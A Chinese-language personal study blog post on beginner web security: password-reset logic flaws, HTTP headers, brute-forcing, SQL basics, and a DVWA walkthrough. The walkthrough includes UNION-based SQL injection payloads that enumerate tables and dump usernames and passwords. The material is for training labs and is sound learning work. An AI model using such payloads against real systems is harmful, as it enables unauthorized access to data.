学习总结

web基础知识:https://www.bugbank.cn/q/article/5982c773eec8b124691a2b2c.html

两个逻辑漏洞:

逻辑漏洞——简单的任意账户密码重置

逻辑漏洞-1https://www.bugbank.cn/q/article/59857e58236eaa5a3a8d8400.html


浅谈APP漏洞挖掘之逻辑漏洞

APP漏洞挖掘中逻辑漏洞,包括任意用户密码重置,支付漏洞,任意用户未授权登录。

 方法一:密码找回的凭证太弱,为4位或6位纯数字,并且时效过长,导致可爆破从而重置用户密码

 方法2:验证码传输在数据包中。

  这里共有两种可能,一种在返回包,一种在获取验证码的数据包中。我们来看两个实例。

逻辑漏洞-2:https://www.bugbank.cn/q/article/5985809e236eaa5a3a8d8429.html

请求包的理解

post:向服务器发送数据包

get:获取数据包

host:主机名

user-agent:给用户做代理

accept:接受所获取的数据


referer:引用来源

Accept-Encoding:浏览器发给服务器,表明浏览器所能支持的编码类型

Accept-Language:请求头允许客户端声明它可以理解的自然语言

Cookie:储存在用户本地终端上的数据

问题:

1:什么样的字段是爆破字段,爆破是起到什么样的作用

通过向路老师请教 了解到爆破其实就是去通过反复的试验密码,进行丢包。

爆破字段就是把要爆破的内容选上,通过软件从字典里面读取,然后再替换成读取的数据。


2.单引号让ID闭合


像语文里面的语法一样,一个引号是不能成立的

想要的效果是 select name,pass from test where id = '1' union select1,database()#

需要输入 1' union select1,database()#

结合起来就是select name,pass from test where id = '1' union select1,database()#'

最后的单引号因为注释而失去的作用

此处的单引号是为了与前面的单引号闭合,为了保证语法正确,才能运行

3.在url中的输入你的payload

eg:http://localhost/sqli-labs-master/Less-2/?id=1--

数据库基础

一个数据库里有很多表,每个表里有许多字段,每个字段有各自的内容。

数据库相当于学校名称(一中、二中、三中),表相当于班级(一班、二班、三班),

字段相当于学生的属性(名字、学号、性别、),

字段的内容就是前面学生属性的具体内容(名字是什么,学号是什么,性别是什么)。

select 字段

from 表名

Select 密码

from 班级

select 字段名 from 表名

where 条件。

Select 密码

from 班级 where 学生学号=1

Select pass from new limit 1,2     (因为是从0开始排序

所以学号为1的人排序是0,学号为2 的人排序是1)

Union 联合查询

联合查询的意思是,你刚刚已经进行过一次查询了,

现在你想在查另外一个,他会把你第二次查询的内容放在第一次查询结果的后面。

比如说你第一次查了一个学生的名字,你现在用联合查询又查了他的密码,

他会把你查到的密码放在你第一次查到的名字的下面。


数据表之间的关系

一对多/多对一

一对一

多对多



 dvwa sql注入

 dvwa sql注入

级别:Low

① 输入1  提交

④输入1 and 1=2提交

输入

1' union select 1,table_name from information_schema.tables where table_name='dvwa'#

输入1' union select 1,column_name from information_schema.columns where table_name='users'#

输入 

1' union select 1,concat(user,password) from users#

级别 Medium

级别 High

步骤和级别一相识

sql-labs

放截图太乱了 这是学习sql-labs的网址

源码下载地址:https://github.com/Audi-1/sqli-labs

安装方法 :https://jingyan.baidu.com/article/67662997a0527d54d51b84df.html

使用方法:https://cloud.tencent.com/developer/news/217484

https://www.xuebuyuan.com/3258224.html

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,254评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,875评论 3 387
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,682评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,896评论 1 285
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,015评论 6 385
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,152评论 1 291
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,208评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,962评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,388评论 1 304
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,700评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,867评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,551评论 4 335
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,186评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,901评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,142评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,689评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,757评论 2 351

推荐阅读更多精彩内容